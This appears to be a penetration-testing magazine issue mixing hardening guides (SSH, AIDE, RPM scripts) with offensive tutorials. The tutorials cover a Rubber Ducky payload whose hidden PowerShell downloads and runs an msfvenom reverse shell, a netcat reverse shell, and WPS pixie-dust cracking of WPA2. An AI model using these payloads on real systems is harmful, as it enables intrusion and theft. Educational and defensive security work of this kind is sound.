Where ####/sshd is the PID listed in output from the previous command:
kill ####

Login to the drop box:
ssh root@localhost -p 2222
Source: ssh-phone-home

Author: Mayur Agnihotri


(Information Security Enthusiast)

I hold a Bachelor of Engineering in Information Technology and
have certifications under my belt such as C|EH - Certified Ethical
Hacker, Cyber Security for Industrial Control Systems, Operational
Security for Control Systems, Advanced Security In The Field, and
Basic Security In The Field

Twitter: @I_AM_Mayur0021

I have 3+ years of experience and love to spend time finding bugs/vulnerabilities.

Kali Linux Rubber
Ducky
by Sam Vega
In this edition of Pentest Magazine, I decided to write my article on Kali, USB
Rubber Ducky, and the Simple Ducky Payload Generator. I will take it a step
further by utilizing msfvenom to create a custom exe to spawn a reverse shell
and use a custom ducky script to deliver the payload. Why write an article on
this topic? A few weeks back, I was surfing Pluralsight and I stumbled upon a video by Troy Hunt
about the USB Rubber Ducky. He was discussing possible payloads that can be delivered through the
evil HID. As of late, I have been pondering ways to educate SMBs on the different techniques by
which a simple payload can be executed in order to infiltrate their business undetected.

This article assumes that you are familiar with Kali Linux and its awesomeness. Now, USB Rubber
Ducky, if you are not familiar with it:

"The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language
allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic
human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/
avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found 

at usbrubberducky.com. Quack!"

README.txt copied from https://github.com/hak5darren/USB-Rubber-Ducky

USB Rubber Ducky is a commercial product. It is worth the cash and fun to play with!

We will continue on to the Simple Ducky Payload Generator created by skysploit.

The generator can be downloaded at https://code.google.com/archive/p/simple-ducky-payload-
generator/downloads. The version as of this writing is installer_v1.1.1_debian.sh.

Once you download the file onto your Kali system, navigate to the Downloads folder to run the file. You
will need to change the permissions of the file prior to executing, see below. Instructions are also found
on the web page, including YouTube video.

Below is a series of screenshots similar to what you should see during the installation process.

Now simply type simple-ducky to run the payload generator.

Now, for this article, I will stick to option #2, since typically our victims will be Windows users. For this
demo I will use a Windows 7 "Persistence Reverse Shell" as the payload.

You need to specify if the machine has UAC enabled. In my case it does, so I enter Y.

At the next screen there are more questions to answer: what would you like the username & password
of the newly created admin to be, what IP address should the reverse shell connect to, is UAC
enabled, etc.


The success screen is as follows:

At this point you will be asked if you want to set up the ncat listener and if you want to return to the
main menu. I entered Yes to both prompts. As you see below a window opens with the created files,
including the listener on whatever port you specified.

Now the next task would be to copy the inject.bin file from /usr/share/simple-ducky to the microSD
card, which will afterwards be inserted into the ducky. The ducky would be inserted into the victim
machine.

What will this payload do exactly? It will create a persistent shell, create a local admin account, drop
the firewall, and enable Remote Desktop/Remote Desktop Assistance.

Now this payload generator is a nifty tool, but what if you want to generate your own payloads for
whatever reason? First you will need the Duck Encoder, which can be downloaded from Hak5 Darren's
Github page (URL near top of article).

So now I will generate my own payload using msfvenom and ducky script.







On my Kali machine, I created a 32-bit binary to run on my Windows box using the following command:
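The command itself appears only in a screenshot in the original layout; a typical msfvenom invocation for such a 32-bit reverse-shell executable looks like the following (an illustrative reconstruction: LHOST and LPORT are placeholders, and the output name is assumed from the file name used later in the article):

```shell
# Generate a 32-bit Windows reverse Meterpreter executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-kali-ip> LPORT=443 \
    -f exe -o msfducky.exe
```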

Now to create the ducky payload, thanks to Mubix.

GUI R
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://www.yourwebsite.com/msfducky.old','%temp%\msfducky.exe'); Start-Process "%temp%\msfducky.exe"
ENTER

Save it as payload.txt. Next the inject.bin file needs to be created, which is saved to the root of the
ducky, the evil HID.

Usage (within the Duck Encoder directory): java -jar duckencoder.jar -i payload.txt -o /media/root/XXXX-XXXX/inject.bin

XXXX-XXXX = name Kali gives to your ducky.

With your ducky carrying the payload, all you need to do is insert it into the victim machine. Ducky will
do the rest. :)

Now, see below, how can we take this a step further? On one of my machines running AVG, it picked
up my malicious binaries, but not my malicious DLLs.

So what next? Create a ducky script to run the malicious DLLs. On a Windows box, the following
command executes the DLL:

C:\Windows\System32 (or SysWOW64)\rundll32.exe %temp%\msfducky.dll,duck

(duck = non-existent function but needed to properly execute the rundll32 command. You can use
anything here such as aaaa)

In order to create the DLL payload, instead of using "-f exe" within msfvenom, you will use "-f dll".
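For instance (an illustrative sketch; LHOST, LPORT, and the output name are placeholders, with only the format flag changed from the exe case):

```shell
# Same payload idea, but emitted as a DLL for rundll32 execution
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-kali-ip> LPORT=443 \
    -f dll -o msfducky.dll
```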

You might be asking, where is the ducky script? I'll leave that to you ... :)

Author: Sam Vega


Sam has been fiddling with computers for over 20 years but has
been officially an IT professional since 2008. Currently a Senior
Technical Systems Analyst for a nationally recognized hospital
working in the capacity of a Senior Desktop Engineer. He holds
current industry standard certifications. He enjoys writing & reverse
engineering code, analyzing malware, performing PoCs and figuring
out complex problems. His mindset is defender by day and
attacker by night. So that makes him part of the Purple Team by
design and a lover of all things infosec by nature.

What is Hardening? And
why do I need it?
by Junior Carreiro

There are various methods for performing hardening of a system. These methods can range from
closing a port on the firewall to disabling certain information that a web server may expose to the
internet. We need to use a hardening process to ensure that our environment's security is at a
maximum, because this greatly reduces the risk of exposure to breaches. However, we always have to
remember to keep a good balance between security, functionality, and usability.

According to Wikipedia, hardening is the term given to the process of configuring a given system, where
these settings are designed to reduce vulnerabilities and security breaches.
Part of this process includes the removal/disabling of unnecessary services, adjustments to certain
configurations, the removal of unnecessary users, and password policies, among others.
There are various methods for performing hardening of a system. These methods can range from
closing a port on the firewall to disabling certain information that a web server may expose to the
internet.
We need to use a hardening process to ensure that our environment's security is at a maximum,
because this greatly reduces the risk of exposure to breaches. However, we always have to remember
to keep a good balance between security, functionality, and usability.

Where can I find information about hardening?
The Internet has lots of information about security and hardening settings.
Websites of major companies and products, such as RedHat, Oracle, and Apache, have specific
documents about these settings.
Additionally, there are websites specializing in hardening documentation, such as the National Institute
of Standards and Technology (http://www.nist.gov/) and the Center for Internet Security
(https://www.cisecurity.org/). These sites have extensive documentation on hardening various
systems and applications, such as operating systems for servers, desktops and smartphones, web
servers, databases, and many others.

The hardening process


We can start the hardening process with a new installation, or we can apply it in production;
in which case it will require a little more attention and review of the settings that need modification.

It is useful to generate a report before and after changing our environment, so we know which settings
are vulnerable; for this we can use Lynis, an audit tool made by Cisofy (https://cisofy.com/). When we
execute the script, it shows us a report on the current state of our system.
The installation process is very simple:
[root@pwned ~]# git clone https://github.com/CISOfy/lynis
[root@pwned ~]# cd lynis/
[root@pwned lynis]# ./lynis audit system

The pictures below show some of the script's output:

With this report in hand, we can treat the items listed on it, and also pick up a document for reference.
For this article, I am using the document of recommendations for CentOS 6, which can be found on the
CIS website.

This document is separated by sectors:
• Install Updates, Patches, and Additional Security Software
• OS Services
• Special Purpose Services
• Network Configuration and Firewalls
• Logging and Auditing
• System Access, Authentication and Authorization
• User Accounts and Environment
• Warning Banners
• System Maintenance

Each of these sectors has a number of configuration recommendations, such as for SSH.

We can create a script to automate this process and use tools like Puppet or Chef to run it. In the case
of the SSH settings, the script would look like the following:

[root@pwned ~]# cat hardning_ssh.sh

file_sshd="/etc/ssh/sshd_config"

echo "Creating security copies of sshd_config"

if [ -f $file_sshd.original ]
then
echo "The file already exists"
else
cp $file_sshd{,.original}
echo "Created file"
fi
sleep 2
echo ""
echo "##############################################" >> $file_sshd
echo "### Security Changes ###" >> $file_sshd
echo "##############################################" >> $file_sshd
echo ""
echo ">> Set LogLevel to INFO"
sleep 2
grep "^LogLevel" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 0
then
echo "- The parameter correct"
else
echo "#Set LogLevel to INFO" >> $file_sshd
echo "LogLevel INFO" >> $file_sshd
echo "- The parameter fixed"
fi

echo ""
echo ">> Disable SSH Password authentication"
sleep 2
grep "^PasswordAuthentication yes" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 1
then
echo "- The parameter correct"
else
sed -i 's/PasswordAuthentication yes/#PasswordAuthentication yes/g' $file_sshd
echo "#Disable SSH Password authentication" >> $file_sshd
echo "PasswordAuthentication no" >> $file_sshd
echo "- The parameter fixed"
fi

echo ""
echo ">> Disable SSH Root Login"
sleep 2
grep "^PermitRootLogin yes" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 1
then

echo "- The parameter correct"
else
sed -i 's/PermitRootLogin yes/#PermitRootLogin yes/g' $file_sshd
echo "#Disable SSH Root Login" >> $file_sshd
echo "PermitRootLogin no" >> $file_sshd
echo "- The parameter fixed"
fi

echo "Reload service SSH"


/etc/init.d/sshd reload

This script applies the key recommendations outlined in our document.
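After running the script and reloading sshd, the effective settings can be double-checked (assuming an OpenSSH version that supports the -T test mode, which prints the effective configuration):

```shell
# Dump the effective sshd configuration and verify the hardened values
sshd -T | grep -iE '^(loglevel|passwordauthentication|permitrootlogin)'
```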


We can also use LockDown, a tool that lets us choose which areas of our OS we want to apply the
settings to.

[root@pwned ~]# git clone https://github.com/BlackTieSecurity/LockDown.git


[root@pwned ~]# cd LockDown

You can run install.sh, which is inside the folder, or you can open the file and install the
dependencies manually.

We need to use a hardening process to ensure that our environment's security is at a maximum.
The system is simple and easy to use, as you can see below:

[root@pwned ~]# ruby lockdown.rb --help


Usage: lockdown.rb [options]
Does not run in a production environment without reading the code. There are settings that can
affect directly your environment.
Options:
--accounts Apply config on Accounts and Environment

--boot Apply config on Boot Settings
--ssh Apply config on SSH Configuration
--ipv6 Disable IPv6
--services Disable Services
--kernel Apply config on kernel Parameters
--others Additional Process Hardening
--audit Logging and Auditing
--ntpd Configure NTPD
--pam Pam configuration
--password Password configuration
--permission Verifiy Permissions
--removesoft Remove Unnecessary Software - *Create a list of the software to be
uninstalled within /tmp/soft.lst
-A, --apllyall Apply all configurations
-v, --version Show Version
--message Show This Message

Conclusion
The process of hardening any application or system is very important, as well as very tiring,
especially across a very large fleet of machines. But as we saw, the process is essential for reducing
failures and security breaches; moreover, automating this process is well worth the effort.

Author: Junior Carreiro

Junior Carreiro (aka _0x4a0x72)

Member of DC-Labs Security Team

Founder BlackTieSecurity

https://br.linkedin.com/in/juniorcarreiro

https://twitter.com/_0x4a0x72

Netcat with - Hacking
Backdoors
by Dhamu Harker

I will cover some of the uses of netcat, known as the “TCP/IP Swiss army knife”.
Netcat is a very powerful and versatile tool that can be used in diagnosing
network problems or in penetration testing.

What is Netcat
Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or
UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly, or easily driven
by other programs and scripts.

The original netcat's features include:

• Outbound or inbound connections, TCP or UDP, to or from any ports


• Full DNS forward/reverse checking, with appropriate warnings
• Ability to use any local source port
• Ability to use any locally configured network source address
• Built-in port-scanning capabilities, with randomization
• Built-in loose source-routing capability
• Can read command line arguments from standard input
• Slow-send mode, one line every N seconds
• hex dump of transmitted and received data
• Optional ability to let another program service establish connections
• Optional telnet-options responder
• Featured tunneling mode which permits user-defined tunneling, e.g., UDP or TCP, with the possibility
of specifying all network parameters (source port/interface, listening port/interface, and the remote
host allowed to connect to the tunnel)
• Rewrites like GNU's and OpenBSD's support additional features. For example, OpenBSD's nc
supports TLS.






Let us start with some basics:

Banner grabbing:
To establish a simple connection with nc, you need to use the following command:

* nc -v domain.com 80
The information returned can vary; this time the bit we are interested in is the server version and the
operating system. Sometimes there is more to be discovered, like the PHP version that powers the
server, etc.
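After the connection opens, the banner is usually elicited by typing a minimal HTTP request by hand; the same thing can be done non-interactively (the host name here is a placeholder):

```shell
# Pipe a bare HEAD request into nc; the response headers typically
# reveal fields such as Server: and X-Powered-By:
printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -v example.com 80
```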

Port scanning:

Netcat can also be used as a very basic port scanner:

* nc -v -n -z -w 1 domain.com 1-65535

Here we scanned the full range of ports, 1 to 65535; in this example, ports 21 and 80 turned out to be
open. The -n switch disables DNS lookup, and the -z switch tells nc not to send any data, thus reducing
the time it requires to talk to the ports. The -w 1 tells netcat to wait at most 1 second for each
connection. This is a TCP-only scan. For UDP, add the -u flag.
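For example, a UDP sweep of a few common service ports might look like this (the ports were chosen for illustration):

```shell
# UDP scan (-u) of DNS, NTP and SNMP ports with a 1-second timeout
nc -v -n -z -u -w 1 domain.com 53 123 161
```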

Port scanning 2:

This is a different way to scan for open ports on a server

commands:

* nc -v -w 1 domain.com -z 1-1000

Netcat supports IPV6 connectivity:


The -4 or -6 flag specifies which type of addresses the netcat utility should use. -4 forces nc to use
IPV4 addresses, while -6 forces nc to use IPV6 addresses.

Server $:
nc -4 -l 2389

Client $:
nc -4 localhost 2389

Now, if we run the netstat command, we see:

$ netstat | grep 2389

tcp      0   0 localhost:2389       localhost:50851       ESTABLISHED


tcp      0   0 localhost:50851      localhost:2389        ESTABLISHED

The first field in the above output would contain a postfix '6' if IPV6 addresses were being used. Since
in this case it does not, the connection between server and client was established using IPV4
addresses.

Now, let us force nc to use IPV6 addresses.

Server :

$ nc -6 -l 2389

Client :

$ nc -6 localhost 2389

Now, if we run the netstat command, we see:

$ netstat | grep 2389

tcp6     0   0 localhost:2389        localhost:33234      ESTABLISHED


tcp6     0   0 localhost:33234       localhost:2389       ESTABLISHED

So now a postfix ‘6’ with ‘tcp’ shows that nc is now using IPV6 addresses.

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.
Force Netcat Server to stay up:
If the netcat client is connected to the server and the client later disconnects, then normally the
netcat server also terminates.

Commands:

Server :
$ nc -l 2389

Client:
$ nc localhost 2389

Server :
$ nc -l 2389

This behavior can be controlled by using the -k flag at the server side to force the server to stay up
even after the client has disconnected.

Commands :

Server :
$ nc -k -l 2389

Client :
$ nc localhost 2389

Server :
$ nc -k -l 2389

So we see that by using the -k option the server remains up even if the client got disconnected.

Copying a file from one system to the other:

On server2 (the receiving side), run:

nc -lp 1234 > config.tar.gz

On server1 (the sending side), run:

nc -w 1 server2.example.com 1234 < config.tar.gz
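The same technique extends to whole directory trees by piping tar across the connection, a common netcat pattern (host names and paths here are examples):

```shell
# On the receiving host: listen and unpack the incoming archive
nc -lp 1234 | tar xzf -

# On the sending host: stream the directory as a gzipped tar
tar czf - /etc/myapp | nc -w 1 server2.example.com 1234
```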

Netcat supports timeout:

There are cases when we do not want a connection to remain open forever. In that case, the '-w'
switch lets us specify a timeout for the connection. After the number of seconds specified with the -w
flag, the connection between the client and server is terminated.

Server :
$ nc -l 2389

Client :
$ nc -w 10 localhost 2389

The connection above would be terminated after 10 seconds.

NOTE : Do not use the -w flag with -l flag at the server side; in that case -w flag causes no effect and
hence the connection remains open forever.


Netcat reverse shell linux :

Netcat is rarely present on production systems, and even if it is, there are several versions of netcat,
some of which do not support the -e option.

On the attacker machine, start a listener:

$ nc -lvp 443

On the victim machine, connect back and attach a shell:

$ nc -nv ipaddress 443 -e /bin/sh

Configure Netcat client to stay up after EOF:

Netcat client can be configured to stay up after EOF is received. In a normal scenario, if the nc client
receives an EOF character then it terminates immediately, but this behavior can also be controlled if the
-q flag is used. This flag expects a number which depicts the number of seconds to wait before the
client terminates (after receiving EOF).

Client should be started like:

$nc  -q 5  localhost 2389

Now, if the client ever receives an EOF, then it will wait for 5 seconds before terminating.

Serve web pages:

You can even use netcat to act as a web server :

Command:
$ nc -l -p 80 -q 1 < somepage.html

This would serve the page somepage.html until you close the terminal window.
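Since the listener exits after serving one client, a small loop is the usual way to keep the page available (a sketch; on netcat variants without -q, the -k flag discussed earlier is an alternative):

```shell
# Re-arm the listener after each request so successive clients are served
while true; do nc -l -p 80 -q 1 < somepage.html; done
```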

Author: Dhamu Harker


Dhamotharan is a security professional working at Brisk Infosec
Solution LLP with in depth knowledge in Penetration Testing and
offensive security. He is a conventional member of National Cyber
Defence Research Centre . He is continuing his work as a security
researcher in IT Security.

Cracking WPA2 via Pixie
dust attack
by Jose Rodriguez

In this article, a technique known as a pixie-dust attack will be demonstrated,
where an attacker could, in a relatively short amount of time, crack the WPA/2
PSK. The attack consists of cracking the WPS PIN by attempting to associate
with the access point, and getting cryptographic information to later crack the
PSK and gain access.

Wireless is a great and convenient technology that facilitates our access to the same things we would
do on a computer connected to the network via an Ethernet cable: the latest news, entertainment,
social media, games, and even communicating with relatives/friends while lying in bed without the
annoyance of cables. However, it can also be a serious risk when security is left out of the equation.
With increasing cyber attacks being the norm today, people are becoming more security aware,
although some still see security as an obstacle to functionality. Throughout my career as a security
analyst, and network security engineer I have come across a number of big companies that still have 

an old audio/visual system that requires WEP as the encryption standard, and this equipment is being
bridged to corporate networks. It is not uncommon to occasionally come across a home/small
business wireless router that is not properly configured, and just by virtue of creating passwords of 15+
characters it is assumed to be secure. But all it takes is a clever attacker to find another vulnerability,
and circumvent the very long password.

Cracking WPA/WPA2-PSK via Pixie-dust attack in action.

Before starting the attack, there are some preparation steps that need to be performed in order for the
process to work as reliably as possible. First, bring down your wireless interface. In this example the
wireless interface is referred to as wlan2. It could be named differently on your system, depending on
various factors; check what yours is called.

Note: The following example is based on Kali 2.0

Bring down the wireless interface. You can do this by typing:
ifconfig yourwirelessinterface down
(ifconfig wlan2 down)

Note: if no error is displayed, the command was successful

By issuing the command ifconfig we can verify only the loopback interface is displayed.

To display all the running processes that could interfere with the wireless interface, type the following
command: airmon-ng check

As we can see on the picture displayed below, several processes are running and will need to be
terminated to avoid unexpected behavior.

To terminate the processes, type: airmon-ng check kill
(this kills all interfering processes at once; individual processes can also be killed with kill PID#, e.g., kill 591)

Note: make sure all the processes listed by airmon-ng are killed

After killing all processes, proceed to change the MAC address of your wireless interface. To accomplish
this we can use macchanger -r wlan2 (note: the -r switch in macchanger generates a random MAC
address. You could manually specify the desired MAC address with the -m switch. Use macchanger
--help for additional options)

Now proceed to change the mode of operation of the wireless card to monitor, so that wireless traffic
can be sniffed. This can be accomplished by typing:
iwconfig yourwirelessinterface mode monitor

(iwconfig wlan2 mode monitor)

To confirm the wireless interface is in monitor mode type: iwconfig wlan2

Bring up the wireless interface, type: ifconfig yourwirelessinterface up (ex:ifconfig wlan2 up)

Now we are going to use a tool known as wash (the Wi-Fi Protected Setup Scan Tool)

Type: wash -i yourwirelessinterface (ex: wash -i wlan2)

Note: you can specify the channel, and more options (see wash --help)

If the field "WPS Locked" displays YES, more than likely this attack will not work on that router. NOTE:
if you get a bunch of errors about FCS checking, add the following option to the end of the
command: --ignore-fcs

Now that we have selected our target, let us initiate the attack with the use of a tool called reaver. Type:
reaver -b macaddressofyourtargetap -i yourwirelessinterface -c channel -vvv -K 1 -S -N

(reaver -b c8:3A:35:f9:4b:58 -i wlan2 -c 6 -vvv -K 1 -S -N)

Commands explained:

reaver [the tool itself]

-b [the BSSID (MAC address) of the target AP]
-i [to specify the wireless interface]
-c [the channel the AP is using to broadcast its SSID]
-vvv [verbosity level in terms of seeing feedback when performing the attack]
-K 1 [runs the pixiewps tool to crack both the PIN and the WPA/2 PSK]
-S [to use small Diffie-Hellman keys, which speeds up the attack]
-N [to avoid sending NACK messages to the AP when performing the attack. Think of it as the AP replying,
"no, it did not work", and your card replying, "It didn't?"]

You should see a lot of information scroll down quickly

Scroll down until you find the PIN, and the WPA/WPA2 PSK. Note: this process could take anywhere
from a few minutes to hours, depending on several factors (ex: network traffic, signal quality, etc.)

Using the information obtained, you should be able to establish a connection to the AP, and
authenticate like a regular device.
Note: Do not forget to set your interface card back to managed mode, and restart the daemons
responsible for managing the connection before trying to connect. Below are the steps to change the
wireless card mode, and restart the necessary daemons.

Bring down your network interface

To change the mode of operation back to the default, type:
iwconfig yourwirelessinterfacecard mode managed

(iwconfig wlan2 mode managed)

Bring up your wireless interface by typing: ifconfig yourwirelessinterface up (ifconfig wlan2 up)

Then you will need to restart the normal network daemons that are responsible for handling the wireless
connections.

The commands are:

/etc/init.d/networking restart
/etc/init.d/network-manager restart

Conclusion

As a security measure, disable WPS on the wireless router unless a device leaves you absolutely no
other choice. Keeping this option available could serve a malicious user well, and could lead to
a compromise. More modern routers come with features such as PIN lockout after x number of
failed attempts, or throttling technology.

Tools:
Airmon-ng (www.aircrack-ng.org) - included in Kali 2.0
Reaver - included in Kali 2.0
Pixiewps - included in Kali 2.0

Author: Jose Rodriguez

I currently hold the following certifications: CCNA, Sec+, Net+,
Project+, Server+, LPIC-1, SUSE 11, Linux+, A+, HP-ATA
Networks, ACSP and CEH. I also have around 5 years of
experience in the security field performing vulnerability
assessments, penetration testing, system hardening, and
network security.

Linux Security - Best
practice
by Ragul Balakrishan

Due to the increased reliance on powerful networked computers to help run


businesses and keep track of our personal information, entire industries have
been formed around the practice of networking and computer security.
Enterprises have solicited the knowledge and skills of security experts to
properly audit systems and tailor solutions to fit the operating requirements of
their organizations.

Tracking Security Updates


A brief overview of how security and other updates from Red Hat can be applied to servers is given below.

Understanding Red Hat security ratings:

Red Hat Product Security rates the impact of security issues found in Red Hat products using a four-
point scale (Low, Moderate, Important, and Critical), as well as Common Vulnerability Scoring System
(CVSS) base scores. These provide a prioritized risk assessment to help you understand, and schedule
upgrades to your systems, enabling informed decisions on the risk each issue places on your unique
environment.

To list all available erratas without installing them, run:


# yum updateinfo list available
To list all available security updates without installing them, run:
# yum updateinfo list security all
To get a list of the currently installed security updates this command can be used:
# yum updateinfo list security installed
# yum updateinfo list
This system is receiving updates from RHN Classic or RHN Satellite.
RHSA-2014:0159 Important/Sec. kernel-headers-2.6.32-431.5.1.el6.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-5.1.73-3.el6_5.x86_64

RHSA-2014:0164 Moderate/Sec. mysql-devel-5.1.73-3.el6_5.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-libs-5.1.73-3.el6_5.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-server-5.1.73-3.el6_5.x86_64
RHBA-2014:0158 bugfix nss-sysinit-3.15.3-6.el6_5.x86_64
RHBA-2014:0158 bugfix nss-tools-3.15.3-6.el6_5.x86_64
If you want to apply only one specific advisory:
# yum update --advisory=RHSA-2014:0159
However, if you would like to know more information about this advisory before applying it:
# yum updateinfo RHSA-2014:0159
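The fixed-column format of this listing is easy to post-process with standard tools. As a quick sketch (the helper name is made up, and the sample lines are taken from the output above), pending errata can be counted by severity:

```shell
# Count pending errata by severity/type from `yum updateinfo list` output.
# On a real RHEL system you would pipe the live output instead:
#   yum updateinfo list | summarize_errata
summarize_errata() {
  awk '
    $1 ~ /^RH(SA|BA|EA)-/ {
      split($2, sev, "/")            # "Important/Sec." -> "Important"
      count[sev[1]]++
    }
    END { for (s in count) print s, count[s] }
  '
}

# Feed it the sample listing from the article:
summarize_errata <<'EOF'
RHSA-2014:0159 Important/Sec. kernel-headers-2.6.32-431.5.1.el6.x86_64
RHSA-2014:0164 Moderate/Sec.  mysql-5.1.73-3.el6_5.x86_64
RHSA-2014:0164 Moderate/Sec.  mysql-libs-5.1.73-3.el6_5.x86_64
RHBA-2014:0158 bugfix         nss-tools-3.15.3-6.el6_5.x86_64
EOF
```

This makes it easy to see at a glance how many Critical or Important advisories are waiting before a patch window.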

Severity ratings and descriptions:


Critical impact This rating is given to flaws that could be easily exploited by a remote
unauthenticated attacker and lead to system compromise (arbitrary code execution)
without requiring user interaction. These are the types of vulnerabilities that can be
exploited by worms. Flaws that require an authenticated remote user, a local user, or
an unlikely configuration are not classed as Critical impact.

Important impact This rating is given to flaws that can easily compromise the confidentiality,
integrity, or availability of resources. These are the types of vulnerabilities that
allow local users to gain privileges, allow unauthenticated remote users to view
resources that should otherwise be protected by authentication, allow authenticated
remote users to execute arbitrary code, or allow remote users to cause a denial of
service.

Moderate impact This rating is given to flaws that may be more difficult to exploit but could still lead
to some compromise of the confidentiality, integrity, or availability of resources,
under certain circumstances. These are the types of vulnerabilities that could have
had a Critical impact or Important impact but are less easily exploited based on a
technical evaluation of the flaw, or affect unlikely configurations.

Low impact This rating is given to all other issues that have a security impact. These are the
types of vulnerabilities that are believed to require unlikely circumstances to be able
to be exploited, or where a successful exploit would give minimal consequences.

How to validate the RPM scripts before installation


RPM packages can contain several types of scripts:

The preinstall Script:
The preinstall script executes just before the package is to be installed.

The postinstall Script:
The postinstall script executes after the package has been installed. If a package uses
a postinstall script to perform some function, quite often it will also include a postuninstall script that
performs the inverse of the postinstall script after the package has been removed.

The preuninstall Script:
If there is a time when your package needs to have one last look around before the user erases it, the
place to do it is in the preuninstall script. Anything that a package needs to do immediately prior to
RPM taking any action to erase the package can be done here.

The postuninstall Script:
The postuninstall script executes after the package has been removed.

Sample Output:

[root@sampleroot]# rpm -q --scripts kernel.x86_64


postinstall scriptlet (using /bin/sh):
if [ `uname -i` == "x86_64" -o `uname -i` == "i386" ]; then
if [ -f /etc/sysconfig/kernel ]; then
/bin/sed -i -e 's/^DEFAULTKERNEL=kernel-smp$/DEFAULTKERNEL=kernel/' /etc/sysconfig/kernel ||
exit $?
fi
fi
/sbin/new-kernel-pkg --package kernel --mkinitrd --depmod --install 2.6.18-406.el5 || exit $?
if [ -x /sbin/weak-modules ]
then
/sbin/weak-modules --add-kernel 2.6.18-406.el5 || exit $?
fi
preuninstall scriptlet (using /bin/sh):
/sbin/new-kernel-pkg --rminitrd --rmmoddep --remove 2.6.18-406.el5 || exit $?
if [ -x /sbin/weak-modules ]
then
/sbin/weak-modules --remove-kernel 2.6.18-406.el5 || exit $?
fi
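The query above inspects an already installed package; to vet a package file before it ever touches the system, rpm can read the scriptlets straight out of the .rpm with -qp. A hedged sketch (the helper name and package path are illustrative):

```shell
# Print the scriptlets embedded in a package *file* without installing it.
# rpm -qp queries the .rpm directly, so nothing is changed on the system.
inspect_rpm_scripts() {
    if command -v rpm >/dev/null 2>&1 && [ -f "$1" ]; then
        rpm -qp --scripts "$1"      # pre/post (un)install scriptlets
    else
        echo "rpm unavailable or no such package: $1"
    fi
}

inspect_rpm_scripts /tmp/some-package.rpm
```

Reviewing these scriptlets before installation is the only way to know what code will run as root during the install.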

Secure Individual Files with File System Attributes


Most Linux admins know how to secure individual files by modifying their permissions or by
changing the user and/or group ownership. The ext4 and XFS file systems also support additional file
attributes that can help protect a file from being deleted or overwritten.

1. If a file has the ‘A‘ attribute set, its atime record is not updated when the file is accessed.
2. If a file has the ‘S‘ attribute set, its changes are written synchronously to disk.
3. A file with the ‘a‘ attribute set can only be opened in append mode for writing.
4. A file with the ‘i‘ attribute set cannot be modified (immutable). This means no renaming, no symbolic
link creation, and no writing; only the superuser can unset the attribute.
5. If a file has the ‘j‘ attribute set, all of its data is written to the ext3/ext4 journal before being
written to the file itself.
6. A file with the ‘t‘ attribute set has no tail-merging.
7. A file with the ‘d‘ attribute set is not a candidate for backup when the dump program is run.
8. When a file with the ‘u‘ attribute set is deleted, its data is saved. This enables the user to request its
undeletion.

To list attributes:

[root@serverX]# lsattr

----i--------e- ./anaconda-ks.cfg

To make changes:

[root@serverX]# chattr -e ./anaconda-ks.cfg

----i---------- ./anaconda-ks.cfg
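Building on the ‘i‘ attribute described above, the sketch below shows the immutable bit blocking a delete. It needs root and an attribute-capable filesystem such as ext4 or XFS, so it degrades to a no-op elsewhere; the file is a throwaway temporary.

```shell
# Demonstrate that chattr +i blocks deletion (root + ext4/XFS required).
f=$(mktemp)

if [ "$(id -u)" -eq 0 ] && chattr +i "$f" 2>/dev/null; then
    lsattr "$f"                          # the 'i' flag is now shown
    rm -f "$f" 2>/dev/null \
        && echo "unexpected: delete succeeded" \
        || echo "delete blocked by immutable bit"
    chattr -i "$f"                       # clear the flag so cleanup works
fi
rm -f "$f"
echo "immutable-bit demo finished"
```

Setting ‘i‘ on critical configuration files (and ‘a‘ on log files) is a cheap way to blunt accidental or malicious tampering, at the cost of having to clear the flag before legitimate edits.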

Monitoring for file system changes


Filesystem monitoring can be done using aide, as seen below.

1. Add the files to monitor


The files that need to be monitored by aide have to be listed in the /etc/aide.conf file. The aide
package by default installs a reasonable aide.conf that monitors most of the system files. Each file
is assigned a set of attributes that are to be monitored. By default, the following groups are defined:

NORMAL = R+rmd160+sha256

# For directories, do not bother doing hashes


DIR = p+i+n+u+g+acl+selinux+xattrs

p=permissions, i=inode, n=number of links, u=user, g=group


# Access control only
PERMS = p+i+u+g+acl+selinux
To understand each of the above attributes, check "man aide.conf" and customize aide.conf as per
your needs.

Examples:
1. /dir1 group: performs the group check for /dir1 and its sub-directories.
2. =/dir2 group: performs the group check for /dir2 alone.
3. !/dir3 group: skips the group check for /dir3.

2. Build baseline database

To build the initial database, run the following command:


# /usr/sbin/aide --init
This will create the database file here: /var/lib/aide/aide.db.new.gz

3. Protect the database and configuration


Ensure that /etc/aide.conf, /usr/sbin/aide, and /var/lib/aide/aide.db.new.gz are stored in a secure,
preferably read-only media, so that they are not tampered with.

4. Periodically perform integrity checks
First, copy the baseline database, i.e. /var/lib/aide/aide.db.new.gz to /var/lib/aide/aide.db.gz. This is the
location aide will look for the input database by default.
The following command will check the system files against the database for inconsistencies and
generate a report:

# /usr/sbin/aide --check
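To make step 4 routine, the check can be scheduled. A possible cron entry is sketched below; the schedule and mail recipient are illustrative assumptions, and many distributions ship a similar job with the aide package:

```
# /etc/cron.d/aide -- nightly integrity check, report mailed to root
05 4 * * * root /usr/sbin/aide --check 2>&1 | /bin/mail -s "AIDE report" root
```

Remember to re-initialise the database (and re-copy it to the read-only location) after every legitimate package update, or the nightly report will fill up with expected changes.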

Password Protecting GRUB

“Boot Loader Passwords” can be implemented by adding a password directive to its configuration file.
To do this, first choose a strong password, open a shell, log in as root, and then type the following
command:
#/sbin/grub-md5-crypt

When prompted, type the GRUB password and press Enter. This returns an MD5 hash of the
password. Next, edit the GRUB configuration file /boot/grub/grub.conf. Open the file and, below the
timeout line in the main section of the document, add the following line:

password --md5 <password-hash>

